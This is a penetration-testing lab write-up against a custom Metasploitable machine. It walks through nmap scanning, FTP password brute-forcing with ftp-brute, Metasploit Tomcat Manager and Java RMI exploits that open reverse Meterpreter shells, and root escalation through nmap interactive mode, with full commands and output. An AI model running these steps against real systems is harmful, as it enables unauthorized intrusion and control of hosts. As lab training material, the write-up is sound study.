👾Metasploitable (Custom 2)

This is a custom vulnerable machine for a penetration testing module. I had to use the provided leaked information to perform tasks and gain root privileges within a given set of time.

FTP-Brute NSE

Enumeration: "It Worked" Brute Force (NSE)

Tomcat Manager Application

Exploitation: "Succeeded" Tomcat Manager (Msfconsole)

Java RMI

Exploitation: "Succeeded" Java RMI (Msfconsole)

Recon: N.A

Reconnaissance was not needed as I was provided with a list of usernames

Scanning: Nmap

The target IP address was 192.168.249.148

-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-oA: Output in the three major formats at once

┌──(kali㉿kali)-[~/custom2]
└─$ nmap -sV -p- --open 192.168.249.148 -oA c2Open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 08:58 +08
Nmap scan report for 192.168.249.148
Host is up (0.0069s latency).
Not shown: 65505 closed tcp ports (conn-refused), 21 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE  VERSION
23/tcp    open  telnet   Linux telnetd
25/tcp    open  smtp     Postfix smtpd
80/tcp    open  http     Apache httpd 2.2.8 ((Ubuntu) DAV/2)
2121/tcp  open  ftp      ProFTPD 1.3.1
8180/tcp  open  http     Apache Tomcat/Coyote JSP engine 1.1
43358/tcp open  nlockmgr 1-4 (RPC #100021)
47961/tcp open  java-rmi GNU Classpath grmiregistry
54092/tcp open  status   1 (RPC #100024)
60676/tcp open  mountd   1-3 (RPC #100005)
Service Info: Host:  metasploitable.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.33 seconds

📔 I was reminded not to miss out on UDP scanning to find any potential vulnerabilities too

-sU: UDP Scan
-V: Print version number
-T<0-5>: Set timing template (higher is faster)
-F: Fast mode - Scan fewer ports than the default scan
--version-intensity : Set from 0 (light) to 9 (try all probes)
-oA: Output in the three major formats at once

┌──(kali㉿kali)-[~/custom2]
└─$ sudo nmap -sUV -T4 -F --version-intensity 0 192.168.249.148 -oA c2UDP
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:07 +08
Nmap scan report for 192.168.249.148
Host is up (0.00071s latency).
Not shown: 64 open|filtered udp ports (no-response), 33 closed udp ports (port-unreach)
PORT     STATE SERVICE    VERSION
111/udp  open  rpcbind
137/udp  open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
2049/udp open  tcpwrapped
MAC Address: 00:0C:29:D3:9E:35 (VMware)
Service Info: Host: custom2

📔 Masscan can provide a faster scan by using the --rate=1000 flag. It can scan both the TCP and UDP ports together at the same time by using the following example command:

masscan -p1-65535,U:1-65535 10.10.10.x --rate=1000

👍 Enumeration: "It Worked" Brute Force (NSE)

With the provided list of usernames, I can attempt to perform a brute force attack on the FTP port 2121 using the Nmap Scripting Engine (NSE)

PORT      STATE SERVICE  VERSION
2121/tcp  open  ftp      ProFTPD 1.3.1

I had installed the 'seclists' to add more wordlists to my Kali Linux library

sudo apt install seclists

┌──(kali㉿kali)-[~]
└─$ sudo apt install seclists     
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
  seclists
0 upgraded, 1 newly installed, 0 to remove and 641 not upgraded.
Need to get 387 MB of archives.
After this operation, 1,559 MB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 seclists all 2022.1-0kali1 [387 MB]
Fetched 387 MB in 32s (12.3 MB/s)                                                                                                          
Selecting previously unselected package seclists.
(Reading database ... 289621 files and directories currently installed.)
Preparing to unpack .../seclists_2022.1-0kali1_all.deb ...
Unpacking seclists (2022.1-0kali1) ...
Setting up seclists (2022.1-0kali1) ...
Processing triggers for kali-menu (2021.4.2) ...

Reference: https://www.kali.org/tools/seclists/

🤔💭 I was initially using Medusa, a brute forcing tool. However, it seemed to be taking quite a while with a wordlist of 500 passwords. I then ran Nmap (NSE) using the same 500 passwords wordlist as shown in Figure 1 below:

🤔💭 Nmap's ftp-brute NSE seemed to be faster as it managed to complete the brute force attempt in 332.63 seconds (about 5.54 mins) while Medusa had yet to complete

For demonstration purpose, I will be using a smaller wordlist: /usr/share/seclists/Passwords/darkweb2017-top10.txt

📔 The default FTP port is 21. In this case, I will need to use the '-sV' flag for FTP port 2121

-sV: Probe open ports to determine service/version info
-p : Only scan specified ports
--script: Runs a script scan using the comma-separated list of filename|category|directory/|expression[,...]
--script-args: Lets you provide arguments to NSE scripts
-oN: Outputs file in a normal format

┌──(kali㉿kali)-[~/custom2]
└─$ sudo nmap -sV -p 2121 --script=ftp-brute --script-args userdb=/home/kali/custom2/usernames.txt,passdb=/usr/share/seclists/Passwords/darkweb2017-top10.txt 192.168.249.148 -oN c2ftpbrute
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 12:36 +08
Stats: 0:03:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 192.168.249.148
Host is up (0.00037s latency).

PORT     STATE SERVICE VERSION
2121/tcp open  ftp     ProFTPD 1.3.1
| ftp-brute: 
|   Accounts: 
|     xxxxxx:xxxxxx - Valid credentials
|_  Statistics: Performed 27320 guesses in 322 seconds, average tps: 81.9
MAC Address: 00:0C:29:D3:9E:35 (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 322.37 seconds

😄 I managed to find the password used by the username!

| ftp-brute: 
|   Accounts: 
|     xxxxxx:xxxxxx - Valid credentials

Reference: https://www.infosecmatter.com/nmap-nse-library/?nse=ftp-brute

👍 Exploitation: "Succeeded" Tomcat Manager (Msfconsole)

I will attempt to exploit Tomcat Manager port 8180 using the credentials that were obtained from earlier

PORT      STATE SERVICE  VERSION
8180/tcp  open  http     Apache Tomcat/Coyote JSP engine 1.1

Visit the target URL using the internet browser

192.168.249.148:8180

Click on the Tomcat Manager link and enter the default login credentials as shown in Figure 2 below

Username: tomcat
Password: tomcat

I will exploit the Tomcat Manager using Msfconsole

msfconsole

┌──(kali㉿kali)-[~/custom2]
└─$ msfconsole
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: When in a module, use back to go 
back to the top level prompt

msf6 >

search type:exploit tomcat jsp

msf6 > search type:exploit tomcat jsp

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/multi/http/tomcat_mgr_deploy         2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   1  exploit/multi/http/tomcat_mgr_upload         2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   2  exploit/windows/http/cayin_xpost_sql_rce     2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   3  exploit/linux/http/cpi_tararchive_upload     2019-05-15       excellent  Yes    Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
   4  exploit/multi/http/tomcat_jsp_upload_bypass  2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/tomcat_jsp_upload_bypass

msf6 >

use exploit/multi/http/tomcat_mgr_upload
set HttpPassword tomcat
set HttpUsername tomcat
set rhosts 192.168.249.148
set rport 8180
set lhost 192.168.249.140
set lport 8999
options

msf6 > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
HttpPassword => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.249.148
rhosts => 192.168.249.148
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8180
rport => 8180
msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/http/tomcat_mgr_upload) > set lport 8999
lport => 8999
msf6 exploit(multi/http/tomcat_mgr_upload) > options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  tomcat           no        The password for the specified username
   HttpUsername  tomcat           no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.249.148  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         8180             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.249.140  yes       The listen address (an interface may be specified)
   LPORT  8999             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/tomcat_mgr_upload) >

run
getuid
sysinfo

msf6 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 192.168.249.140:8999 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying myqVwooMhNFWHuY18YtXDsFlRU1LL...
[*] Executing myqVwooMhNFWHuY18YtXDsFlRU1LL...
[*] Undeploying myqVwooMhNFWHuY18YtXDsFlRU1LL ...
[*] Undeployed at /manager/html/undeploy
[*] Sending stage (58053 bytes) to 192.168.249.148
[*] Meterpreter session 1 opened (192.168.249.140:8999 -> 192.168.249.148:45227 ) at 2022-03-31 16:50:43 +0800

meterpreter > getuid
Server username: tomcat55
meterpreter > sysinfo
Computer    : custom2
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter >

shell
python -c 'import pty; pty.spawn("/bin/bash")'
nmap --interactive
!sh
whoami

meterpreter > shell
Process 1 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
tomcat55@pt003:/$ nmap --interactive
nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2#

😄 I managed to get the 'root' user by executing '!sh' in the Nmap interactive mode!

Reference: https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/

👍 Exploitation: "Succeeded" Java RMI (Msfconsole)

I will attempt to exploit the Telnet service on port 23 using the log in credentials that I managed to acquire from earlier

PORT      STATE SERVICE  VERSION
47961/tcp open  java-rmi GNU Classpath grmiregistry

msfconsole

┌──(kali㉿kali)-[~/custom2]
└─$ msfconsole                                                                                          
                                                  
 ______________________________________
/ it looks like you're trying to run a \                                                                                                    
\ module                               /                                                                                                    
 --------------------------------------                                                                                                     
 \                                                                                                                                          
  \                                                                                                                                         
     __                                                                                                                                     
    /  \                                                                                                                                    
    |  |                                                                                                                                    
    @  @                                                                                                                                    
    |  |                                                                                                                                    
    || |/                                                                                                                                   
    || ||                                                                                                                                   
    |\_/|                                                                                                                                   
    \___/                                                                                                                                   
                                                                                                                                            

       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View missing module options with show 
missing                                                                                                                                     

msf6 >

search type:exploit java rmi

msf6 > search type:exploit java rmi

Matching Modules
================

   #  Name                                                             Disclosure Date  Rank       Check  Description
   -  ----                                                             ---------------  ----       -----  -----------
   0  exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce  2019-05-22       excellent  Yes    Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
   1  exploit/multi/misc/java_jmx_server                               2013-05-22       excellent  Yes    Java JMX Server Insecure Configuration Java Code Execution
   2  exploit/multi/misc/java_rmi_server                               2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
   3  exploit/multi/browser/java_rmi_connection_impl                   2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
   4  exploit/multi/browser/java_signed_applet                         1997-02-19       excellent  No     Java Signed Applet Social Engineering Code Execution
   5  exploit/multi/http/jenkins_metaprogramming                       2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE
   6  exploit/linux/misc/jenkins_java_deserialize                      2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability
   7  exploit/multi/browser/firefox_xpi_bootstrapped_addon             2007-06-27       excellent  No     Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
   8  exploit/multi/http/totaljs_cms_widget_exec                       2019-08-30       excellent  Yes    Total.js CMS 12 Widget JavaScript Code Injection


Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/totaljs_cms_widget_exec

msf6 >

use exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.148
set rport 47961
set lhost 192.168.249.140
set lport 8889

msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.249.148
rhosts => 192.168.249.148
msf6 exploit(multi/misc/java_rmi_server) > set rport 47961
rport => 47961
msf6 exploit(multi/misc/java_rmi_server) > set lhost 192.168.249.140
lhiost => 192.168.249.140
msf6 exploit(multi/misc/java_rmi_server) > set lport 8889
lport => 8889
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS     192.168.249.148  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      47961            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
                                          0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.249.140  yes       The listen address (an interface may be specified)
   LPORT  8889             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf6 exploit(multi/misc/java_rmi_server) >

sf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.249.140:8889 
[*] 192.168.249.148:47961 - Using URL: http://0.0.0.0:8080/ggqTzR
[*] 192.168.249.148:47961 - Local IP: http://192.168.249.140:8080/ggqTzR
[*] 192.168.249.148:47961 - Server started.
[*] 192.168.249.148:47961 - Sending RMI Header...
[*] 192.168.249.148:47961 - Sending RMI Call...
[*] 192.168.249.148:47961 - Replied to request for payload JAR
[*] Sending stage (58053 bytes) to 192.168.249.148
[*] Meterpreter session 1 opened (192.168.249.140:8889 -> 192.168.249.148:60997 ) at 2022-03-31 15:42:26 +0800
[-] 192.168.249.148:47961 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.148:47961 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >

🤔💭 I am getting the following errors:

[-] 192.168.249.148:47961 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.148:47961 - Server stopped.
[*] Exploit completed, but no session was created.

🤔💭 However it did mention that 'Meterpreter session 1 opened'. Hence, I executed 'sessions' just to check if there was indeed one

sessions

msf6 exploit(multi/misc/java_rmi_server) > sessions

Active sessions
===============

  Id  Name  Type                    Information   Connection
  --  ----  ----                    -----------   ----------
  1         meterpreter java/linux  root @ custom2 192.168.249.140:8889 -> 192.168.249.148:60997  (192.168.249.148)

msf6 exploit(multi/misc/java_rmi_server) >

sessions 1
getuid
sysinfo

msf6 exploit(multi/misc/java_rmi_server) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer    : custom2
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter >

😄 Executing 'getuid' reflected that the Sever username is 'root'!

PreviousMetasploitable (Custom 1)NextMetasploitable (Custom 3)

Last updated 3 years ago

hashtagContents

hashtagRecon: N.A

hashtagScanning: Nmap

hashtag👍 Enumeration: "It Worked" Brute Force (NSE)

hashtag👍 Exploitation: "Succeeded" Tomcat Manager (Msfconsole)

hashtag👍 Exploitation: "Succeeded" Java RMI (Msfconsole)

Contents

Recon: N.A

Scanning: Nmap

👍 Enumeration: "It Worked" Brute Force (NSE)

👍 Exploitation: "Succeeded" Tomcat Manager (Msfconsole)

👍 Exploitation: "Succeeded" Java RMI (Msfconsole)